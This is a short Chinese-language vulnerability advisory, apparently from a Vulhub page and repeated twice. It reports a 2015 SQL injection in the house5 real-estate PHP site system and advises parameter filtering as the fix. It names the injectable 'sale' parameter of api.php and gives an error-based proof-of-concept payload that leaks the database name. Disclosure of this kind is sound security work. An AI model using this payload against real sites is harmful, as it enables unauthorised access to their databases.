VULHUB ™

### 0x01 漏洞框架 公开时间：2015-10-20 漏洞类型：SQL注射漏洞 官方主页： http://www.house5.net/ house5房地产网站管理系统是基于PHP技术的企业级房地产门户管理系统,是国内最具影响力和技术实力的房产网站程序、房地产网站系统、房地产网上销售系统、二手房网站程序。  ### 0x02 漏洞利用 api.php?op=getaround&sale=1 sale为注入点 poc:and extractvalue(1, concat(0x7e , database()))    ### 0x03 修复方案 过滤参数

### 0x01 漏洞框架 公开时间：2015-10-20 漏洞类型：SQL注射漏洞 官方主页： http://www.house5.net/ house5房地产网站管理系统是基于PHP技术的企业级房地产门户管理系统,是国内最具影响力和技术实力的房产网站程序、房地产网站系统、房地产网上销售系统、二手房网站程序。  ### 0x02 漏洞利用 api.php?op=getaround&sale=1 sale为注入点 poc:and extractvalue(1, concat(0x7e , database()))    ### 0x03 修复方案 过滤参数